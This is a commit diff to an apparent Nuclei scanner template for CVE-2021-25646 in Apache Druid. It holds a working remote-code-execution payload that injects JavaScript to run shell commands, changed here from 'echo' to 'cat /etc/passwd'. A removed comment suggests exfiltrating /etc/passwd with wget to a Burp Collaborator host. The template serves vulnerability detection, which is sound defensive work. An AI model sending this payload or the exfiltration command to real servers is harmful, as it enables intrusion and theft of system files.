more changes

2021-06-30 20:28:41 +05:30 · 2021-06-30 20:28:41 +05:30 · cfcb739fbc
parent 16e5ad7fad
commit cfcb739fbc
1 changed files with 44 additions and 11 deletions
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@ -15,17 +15,45 @@ requests:
      - |
        POST /druid/indexer/v1/sampler HTTP/1.1
        Host: {{Hostname}}
-        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
-        Accept: application/json, text/plain, */*
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/json
-        Content-Length: 571
+        Content-Length: 1006
        Connection: close

-
-        {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"odgjxrrrePz","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~echo lgxTckL7cwJwki6GTZbjf9gF6BTSZTGO\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}}
-
-    # To read system Files, replace (wget example.com) with below payload
-    # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
+        {
+        "type":"index",
+        "spec":{
+           "ioConfig":{
+              "type":"index",
+              "firehose":{
+                 "type":"local",
+                 "baseDir":"/etc",
+                 "filter":"passwd"
+              }
+           },
+           "dataSchema":{
+              "dataSource":"odgjxrrrePz",
+              "parser":{
+                 "parseSpec":{
+                    "format":"javascript",
+                    "timestampSpec":{
+                       
+                    },
+                    "dimensionsSpec":{
+                       
+                    },
+                    "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
+                    "":{
+                       "enabled":"true"
+                    }
+                 }
+              }
+           }
+        },
+        "samplerConfig":{
+           "numRows":10
+        }
+        }

    matchers-condition: and
    matchers:
@ -36,10 +64,15 @@ requests:
        words:
          - "application/json"
        part: header
-        condition: and
-      - type: regex
-        regex:
+
+      - type: word
+        words:
          - "numRowsRead"
          - "numRowsIndexed"
        part: body
        condition: and
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body